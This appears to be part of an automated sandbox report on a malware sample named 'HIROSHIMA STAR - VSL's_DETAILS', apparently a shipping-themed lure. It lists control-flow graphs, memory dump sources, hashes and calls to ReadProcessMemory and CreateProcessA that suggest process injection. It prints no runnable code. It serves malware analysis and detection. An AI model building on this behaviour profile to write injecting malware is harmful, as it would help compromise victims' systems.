769 7746892 call 7747caa 740->769 770 7746892 call 7747f7b 740->770 741->735 742->735 743->735 744->735 752 77466e2-77466f1 745->752 753 77466f3-77466fa 745->753 746->735 747->735 748->735 749->735 750->735 751->735 759 7746701-7746707 752->759 753->759 759->735 766 7746898-77468a2 767->766 768->766 769->766 770->766
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Te^q$Te^q$z^I
                                                                                                                                                                      • API String ID: 0-2886491258
                                                                                                                                                                      • Opcode ID: 2a7bff692c6cf5e9e07b505dbf87e46373f86c8dc4e681d91f69d5f62bec19f2
                                                                                                                                                                      • Instruction ID: bddabf8f52e932ddd0ad915e2e4eeedb2eaa14214f489a3551d6d9e804a40dc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a7bff692c6cf5e9e07b505dbf87e46373f86c8dc4e681d91f69d5f62bec19f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 33B127B5E102198FCB08CFA9C9845EDFBB2FB8A350F24842AD415FB268D7349901CF64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 771 77465c0-77465e3 772 77465e5 771->772 773 77465ea-7746644 771->773 772->773 776 7746647 773->776 777 774664e-774666a 776->777 778 7746673-7746674 777->778 779 774666c 777->779 780 7746820-7746890 778->780 781 7746679-77466a1 778->781 779->776 779->780 779->781 782 7746776-774678b 779->782 783 77466b7-77466d7 779->783 784 7746790-77467be 779->784 785 77466dc-77466e0 779->785 786 77467ff-774681b 779->786 787 774673b-7746771 779->787 788 77467c3-77467de 779->788 789 77466a3-77466b5 779->789 790 77467e3-77467fa 779->790 791 774670c-7746736 779->791 807 7746892 call 7748967 780->807 808 7746892 call 7748918 780->808 809 7746892 call 7747caa 780->809 810 7746892 call 7747f7b 780->810 781->777 782->777 783->777 784->777 792 77466e2-77466f1 785->792 793 77466f3-77466fa 785->793 786->777 787->777 788->777 789->777 790->777 791->777 799 7746701-7746707 792->799 793->799 799->777 806 7746898-77468a2 807->806 808->806 809->806 810->806
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Te^q$Te^q$z^I
                                                                                                                                                                      • API String ID: 0-2886491258
                                                                                                                                                                      • Opcode ID: bc2c0b274240cce02648c5e8a710a6e00a35b1636db550f87a43ff09bac17354
                                                                                                                                                                      • Instruction ID: f398c727bc87f8699ab971b4785f9992f73bf9e37b60cbf854dcf9ba7104a2c5
                                                                                                                                                                      • Opcode Fuzzy Hash: bc2c0b274240cce02648c5e8a710a6e00a35b1636db550f87a43ff09bac17354
                                                                                                                                                                      • Instruction Fuzzy Hash: F191B4B4E102199FCB08CFAAC9849DDFBB2FF89350F24942AD415BB264D7349905CF55

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 834 774f408-774f43d 835 774f444-774f475 834->835 836 774f43f 834->836 837 774f476 835->837 836->835 838 774f47d-774f499 837->838 839 774f4a2-774f4a3 838->839 840 774f49b 838->840 856 774f70f-774f718 839->856 840->837 840->839 841 774f594-774f5a7 840->841 842 774f615-774f61e 840->842 843 774f6f5-774f70a 840->843 844 774f530-774f542 840->844 845 774f578-774f58f 840->845 846 774f6d9-774f6f0 840->846 847 774f5fb-774f610 840->847 848 774f504-774f52b 840->848 849 774f547-774f54a 840->849 850 774f6c2-774f6d4 840->850 851 774f623-774f64a 840->851 852 774f5e3-774f5f6 840->852 853 774f5ac-774f5b0 840->853 854 774f4ec-774f4ff 840->854 855 774f68e-774f6a6 840->855 840->856 857 774f64f-774f662 840->857 858 774f4a8-774f4ea 840->858 859 774f6ab-774f6bd 840->859 841->838 842->838 843->838 844->838 845->838 846->838 847->838 848->838 871 774f54d call 7746a3c 849->871 872 774f54d call 774697f 849->872 873 774f54d call 774f858 849->873 850->838 851->838 852->838 860 774f5b2-774f5c1 853->860 861 774f5c3-774f5ca 853->861 854->838 855->838 862 774f664-774f673 857->862 863 774f675-774f67c 857->863 858->838 859->838 866 774f5d1-774f5de 860->866 861->866 865 774f683-774f689 862->865 863->865 864 774f553-774f573 864->838 865->838 866->838 871->864 872->864 873->864
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: TuA$UC;"
                                                                                                                                                                      • API String ID: 0-2071649361
                                                                                                                                                                      • Opcode ID: 0807c4512056f170f7c345215348c0b64bfc56cf914d73d5489f3533bd997578
                                                                                                                                                                      • Instruction ID: b2f95bbe45a2bf90fedab5815b8f44f0b58c57e8776e1668aa99ddb089a29107
                                                                                                                                                                      • Opcode Fuzzy Hash: 0807c4512056f170f7c345215348c0b64bfc56cf914d73d5489f3533bd997578
                                                                                                                                                                      • Instruction Fuzzy Hash: 9991F8B4D25209EFCB08CFA9E5819AEFBF2FF89350F14942AE415A7264DB3499418F50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 874 774f418-774f43d 875 774f444-774f475 874->875 876 774f43f 874->876 877 774f476 875->877 876->875 878 774f47d-774f499 877->878 879 774f4a2-774f4a3 878->879 880 774f49b 878->880 896 774f70f-774f718 879->896 880->877 880->879 881 774f594-774f5a7 880->881 882 774f615-774f61e 880->882 883 774f6f5-774f70a 880->883 884 774f530-774f542 880->884 885 774f578-774f58f 880->885 886 774f6d9-774f6f0 880->886 887 774f5fb-774f610 880->887 888 774f504-774f52b 880->888 889 774f547-774f54a 880->889 890 774f6c2-774f6d4 880->890 891 774f623-774f64a 880->891 892 774f5e3-774f5f6 880->892 893 774f5ac-774f5b0 880->893 894 774f4ec-774f4ff 880->894 895 774f68e-774f6a6 880->895 880->896 897 774f64f-774f662 880->897 898 774f4a8-774f4ea 880->898 899 774f6ab-774f6bd 880->899 881->878 882->878 883->878 884->878 885->878 886->878 887->878 888->878 911 774f54d call 7746a3c 889->911 912 774f54d call 774697f 889->912 913 774f54d call 774f858 889->913 890->878 891->878 892->878 900 774f5b2-774f5c1 893->900 901 774f5c3-774f5ca 893->901 894->878 895->878 902 774f664-774f673 897->902 903 774f675-774f67c 897->903 898->878 899->878 906 774f5d1-774f5de 900->906 901->906 905 774f683-774f689 902->905 903->905 904 774f553-774f573 904->878 905->878 906->878 911->904 912->904 913->904
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: TuA$UC;"
                                                                                                                                                                      • API String ID: 0-2071649361
                                                                                                                                                                      • Opcode ID: 6db2176002306d40dd33eb27507b0c7bff71609152fcdff1c2804eec71079734
                                                                                                                                                                      • Instruction ID: 7dd48ded42d2e79f5303d2bf82361d2b43cf9f961c729010f9bdc7c6a24e4090
                                                                                                                                                                      • Opcode Fuzzy Hash: 6db2176002306d40dd33eb27507b0c7bff71609152fcdff1c2804eec71079734
                                                                                                                                                                      • Instruction Fuzzy Hash: 5791E8B4D25209EFCB08CFAAE5819AEFBF2FF89350F14942AE415A7264DB349541CF50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {#L
                                                                                                                                                                      • API String ID: 0-1361971085
                                                                                                                                                                      • Opcode ID: 5ffc28365139db3a6baf4d6d387d0ef31eca95f3204826121619c4407e0332c7
                                                                                                                                                                      • Instruction ID: 689770c7cba708f6cd4f761d12d98d966c631cca637a2f8438817b97913421f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ffc28365139db3a6baf4d6d387d0ef31eca95f3204826121619c4407e0332c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD107B0E16619DFCB18CFAAD58059DFBF2BF89344F14D92AD419AB224E7309902CF54
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {#L
                                                                                                                                                                      • API String ID: 0-1361971085
                                                                                                                                                                      • Opcode ID: 961bc9672ebc2596f98f5f358302ed9e876d4a9cc5829e36d23e6ceca90b6ffd
                                                                                                                                                                      • Instruction ID: 9c5dd2a74abb746ab492fc30fa2b8e53fea8df8ac23302dbe20c2d102bb96f46
                                                                                                                                                                      • Opcode Fuzzy Hash: 961bc9672ebc2596f98f5f358302ed9e876d4a9cc5829e36d23e6ceca90b6ffd
                                                                                                                                                                      • Instruction Fuzzy Hash: 00D117B0E16619DFCB18CFAAD58059DFBF2BF89344F14D92AD419AB224E7309902CF54
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: `Ygl
                                                                                                                                                                      • API String ID: 0-397929779
                                                                                                                                                                      • Opcode ID: 85b2850532a3ebc1918af408563a15a8e7c82e9f137d44b54534f9aadd738b70
                                                                                                                                                                      • Instruction ID: 0bf6a06b5e2d8c3a8ca2d4b5dd3dcc566371a7ba9bcf926b39d8de8b0252c3d4
                                                                                                                                                                      • Opcode Fuzzy Hash: 85b2850532a3ebc1918af408563a15a8e7c82e9f137d44b54534f9aadd738b70
                                                                                                                                                                      • Instruction Fuzzy Hash: 0091B274E01219CFCB58DFA9D984A9EBBB2FF88304F1085A9D419AB365DB309D46CF50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: iUfo
                                                                                                                                                                      • API String ID: 0-3820436262
                                                                                                                                                                      • Opcode ID: 5096c25a37a1e921e11f40e05042c7454833784de81d15afa0b29af348013349
                                                                                                                                                                      • Instruction ID: ababd6ab3b068454458e250cf68dfada3a5f49f26231c7a61b6495ccb81ef1d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5096c25a37a1e921e11f40e05042c7454833784de81d15afa0b29af348013349
                                                                                                                                                                      • Instruction Fuzzy Hash: 257123B4E11219DFCF48CFA9D9455EEBBB2FF89320F10946AE405E7350E7749A418B50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: `Ygl
                                                                                                                                                                      • API String ID: 0-397929779
                                                                                                                                                                      • Opcode ID: 7f64e7d7bce2ff4e62574f4fd5bde7f67bfce6fde5405e17a2de70883ad1882a
                                                                                                                                                                      • Instruction ID: 93501099aea168396f0ebae178157b86d5159d2f2d65eed1f368c89479d6e25a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f64e7d7bce2ff4e62574f4fd5bde7f67bfce6fde5405e17a2de70883ad1882a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2691C374E00219CFCB54DFA9D984A9EBBF2BF88304F1085A9D419AB369DB309D46CF40
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 5=6
                                                                                                                                                                      • API String ID: 0-2897083178
                                                                                                                                                                      • Opcode ID: f776d3368abd70559f0b62813d7997936911209fdac01b9e19359c530d505889
                                                                                                                                                                      • Instruction ID: 8a095da0b71b554139e7704f5714f25cf7cec7adfc694696441bbf458f08fa36
                                                                                                                                                                      • Opcode Fuzzy Hash: f776d3368abd70559f0b62813d7997936911209fdac01b9e19359c530d505889
                                                                                                                                                                      • Instruction Fuzzy Hash: E77179B4E1521A9FCB08CFA5D9414EEFBB2FF89350F00D92AD016E7264DB749A018F54
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 5=6
                                                                                                                                                                      • API String ID: 0-2897083178
                                                                                                                                                                      • Opcode ID: d5fbc7aa23952ecc6718584b942693172de0bd2e476d1d4172d84fdd7b3d0a99
                                                                                                                                                                      • Instruction ID: cfb496185e6e67490bae747c70a1ad7bb6a4e564c61708076a81766c04b597f6
                                                                                                                                                                      • Opcode Fuzzy Hash: d5fbc7aa23952ecc6718584b942693172de0bd2e476d1d4172d84fdd7b3d0a99
                                                                                                                                                                      • Instruction Fuzzy Hash: 456168B4E1521A9FCB08CFA6D8414AEFBF2FF89350F10D92AD116E7264DB749A018F54
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: iUfo
                                                                                                                                                                      • API String ID: 0-3820436262
                                                                                                                                                                      • Opcode ID: 9d9c87c6edab00dff622a9ecd60f26f035830bcaeb65c2d8f4bda70faf678e0b
                                                                                                                                                                      • Instruction ID: e5ecd091de27457e6fad90cc33aaa285a21093640a1a8cf6d19e9f951a71fa09
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9c87c6edab00dff622a9ecd60f26f035830bcaeb65c2d8f4bda70faf678e0b
                                                                                                                                                                      • Instruction Fuzzy Hash: C55100B4E112199FCF58CFAAD8455EEFBB2FF89310F10842AE405B7254EB785A418F64
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 21eb3d1a5f261de275d20ce13c47752f7718de5b80120c7895119d7a0261af27
                                                                                                                                                                      • Instruction ID: 6fa169f0ed1adc30228e3de4c90c53ad410bc46bd3afd11bfc4812342aee5a55
                                                                                                                                                                      • Opcode Fuzzy Hash: 21eb3d1a5f261de275d20ce13c47752f7718de5b80120c7895119d7a0261af27
                                                                                                                                                                      • Instruction Fuzzy Hash: D6B149B0D16219DFCB18CFAAD58069EFBB2FF89300F24D42AD415A7255EB349A02CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0390c19cdc463c451bf13c29d9bed219044824f2d8488f21d6908c1b78213ce9
                                                                                                                                                                      • Instruction ID: fc2e6fab062518461a7b57054643ea8e9e36cdd73c021478743e2cc2244fb2c1
                                                                                                                                                                      • Opcode Fuzzy Hash: 0390c19cdc463c451bf13c29d9bed219044824f2d8488f21d6908c1b78213ce9
                                                                                                                                                                      • Instruction Fuzzy Hash: A0B1F9B1D16219DFCB18CFAAD58069EFBB2FF89304F20D42AD415A7254EB749A06CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c73235d4619ee6930608af0f4cb91b0d222d2f885b6e44b492b25d1b0768666d
                                                                                                                                                                      • Instruction ID: 24800f6b25913bcf272408a07f5eaa80ba7d5a3be65ccd0d7cf21662c511b03c
                                                                                                                                                                      • Opcode Fuzzy Hash: c73235d4619ee6930608af0f4cb91b0d222d2f885b6e44b492b25d1b0768666d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5541B0F2E05619ABDB18CF6AC8007AEBBF7BFC5304F04C5B9D548AA254EB7409418F91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a843a0cf31504e65223173a2a404a704f5dab44917f614eba9fdcac50ac97812
                                                                                                                                                                      • Instruction ID: 6a2aaafb1f32e0a202f7e38f02a367ae06730e574e48739bac8b67e0668d84a1
                                                                                                                                                                      • Opcode Fuzzy Hash: a843a0cf31504e65223173a2a404a704f5dab44917f614eba9fdcac50ac97812
                                                                                                                                                                      • Instruction Fuzzy Hash: EE3128B1E006588BDB18CFAAD8402DEFBB3BFC9310F14C06AD409AA264DB341A55CF90

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 312 5c3ad88-5c3ad9f 314 5c3ae02-5c3ae10 312->314 315 5c3ada1-5c3adb0 312->315 318 5c3ae23-5c3ae25 314->318 319 5c3ae12-5c3ae1d call 5c39d8c 314->319 315->314 320 5c3adb2-5c3adbe call 5c39e38 315->320 416 5c3ae27 call 5c3ad61 318->416 417 5c3ae27 call 5c3ad88 318->417 319->318 326 5c3aee2-5c3af5a 319->326 327 5c3add2-5c3adee 320->327 328 5c3adc0-5c3adcc call 5c39e48 320->328 323 5c3ae2d-5c3ae3c 334 5c3ae54-5c3ae57 323->334 335 5c3ae3e-5c3ae4f call 5c39e58 323->335 356 5c3af63-5c3af6d 326->356 357 5c3af5c-5c3af62 326->357 340 5c3adf4-5c3adf8 327->340 341 5c3ae9d-5c3aedb 327->341 328->327 336 5c3ae58-5c3ae96 328->336 335->334 336->341 340->314 341->326 360 5c3af73-5c3af8c call 5c39e7c * 2 356->360 361 5c3b1a9-5c3b1d5 356->361 368 5c3af92-5c3afb4 360->368 369 5c3b1dc-5c3b22d 360->369 361->369 376 5c3afb6-5c3afc4 call 5c39e58 368->376 377 5c3afc5-5c3afd4 368->377 382 5c3afd6-5c3aff3 377->382 383 5c3aff9-5c3b01a 377->383 382->383 390 5c3b06a-5c3b092 383->390 391 5c3b01c-5c3b02d 383->391 414 5c3b095 call 5c3b460 390->414 415 5c3b095 call 5c3b470 390->415 394 5c3b02f-5c3b047 call 5c39e8c 391->394 395 5c3b05c-5c3b060 391->395 402 5c3b049-5c3b04a 394->402 403 5c3b04c-5c3b05a 394->403 395->390 398 5c3b098-5c3b0bd 405 5c3b103 398->405 406 5c3b0bf-5c3b0d4 398->406 402->403 403->394 403->395 405->361 406->405 409 5c3b0d6-5c3b0f9 406->409 409->405 413 5c3b0fb 409->413 413->405 414->398 415->398 416->323 417->323
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                      • API String ID: 0-1677660839
                                                                                                                                                                      • Opcode ID: 78627db2185858eb3b0d18e80f9c0a4c29f3c9d68f06be1907acbe5342f39d4d
                                                                                                                                                                      • Instruction ID: e3a0e97a7b2aadcaabfb499716fb428fd4a081916d10d8eac9e04ef461047f8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 78627db2185858eb3b0d18e80f9c0a4c29f3c9d68f06be1907acbe5342f39d4d
                                                                                                                                                                      • Instruction Fuzzy Hash: 03B169357002188FCB19EF78D5549AE77F6BFC8200B2448A9D902EB3A4DE39DD46CB61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 914 79aa238-79aa64d ReadProcessMemory 920 79aa64f-79aa655 914->920 921 79aa656-79aa686 914->921 920->921
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079AA640
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: bb99cdef6e2cbc5c113408b202b30b11830197654ef7145590e239eaaf8cc6b8
                                                                                                                                                                      • Instruction ID: dd8143e24a6d5469384fd7269e92f8f9128de5a73f089fe3a0db68e9e62e61e6
                                                                                                                                                                      • Opcode Fuzzy Hash: bb99cdef6e2cbc5c113408b202b30b11830197654ef7145590e239eaaf8cc6b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 713169B28053999FDB11DFA9C8817DEBFF4FF49310F14842AD548AB251C7349845CBA5

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 925 79aa74c-79aa7ed 927 79aa7ef-79aa7f9 925->927 928 79aa826-79aa846 925->928 927->928 929 79aa7fb-79aa7fd 927->929 933 79aa848-79aa852 928->933 934 79aa87f-79aa8ae 928->934 931 79aa7ff-79aa809 929->931 932 79aa820-79aa823 929->932 935 79aa80b 931->935 936 79aa80d-79aa81c 931->936 932->928 933->934 937 79aa854-79aa856 933->937 944 79aa8b0-79aa8ba 934->944 945 79aa8e7-79aa9a1 CreateProcessA 934->945 935->936 936->936 938 79aa81e 936->938 939 79aa858-79aa862 937->939 940 79aa879-79aa87c 937->940 938->932 942 79aa866-79aa875 939->942 943 79aa864 939->943 940->934 942->942 946 79aa877 942->946 943->942 944->945 947 79aa8bc-79aa8be 944->947 956 79aa9aa-79aaa30 945->956 957 79aa9a3-79aa9a9 945->957 946->940 949 79aa8c0-79aa8ca 947->949 950 79aa8e1-79aa8e4 947->950 951 79aa8ce-79aa8dd 949->951 952 79aa8cc 949->952 950->945 951->951 953 79aa8df 951->953 952->951 953->950 967 79aaa32-79aaa36 956->967 968 79aaa40-79aaa44 956->968 957->956 967->968 971 79aaa38 967->971 969 79aaa46-79aaa4a 968->969 970 79aaa54-79aaa58 968->970 969->970 972 79aaa4c 969->972 973 79aaa5a-79aaa5e 970->973 974 79aaa68-79aaa6c 970->974 971->968 972->970 973->974 975 79aaa60 973->975 976 79aaa7e-79aaa85 974->976 977 79aaa6e-79aaa74 974->977 975->974 978 79aaa9c 976->978 979 79aaa87-79aaa96 976->979 977->976 980 79aaa9d 978->980 979->978 980->980
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079AA98E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: bd3f053bda94988039c8ebdcfdff0c15a1774a32c98ff7779f54e7e9022f8816
                                                                                                                                                                      • Instruction ID: b794e51d1f492a9f5d5033d2916b037a6cc6ccd6c843993c963aff1b52b3c552
                                                                                                                                                                      • Opcode Fuzzy Hash: bd3f053bda94988039c8ebdcfdff0c15a1774a32c98ff7779f54e7e9022f8816
                                                                                                                                                                      • Instruction Fuzzy Hash: 2DA19DB1D0121ADFDB10CF68C9417EDBBB6FF44314F0481AAE848A7250DB349986CF92

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
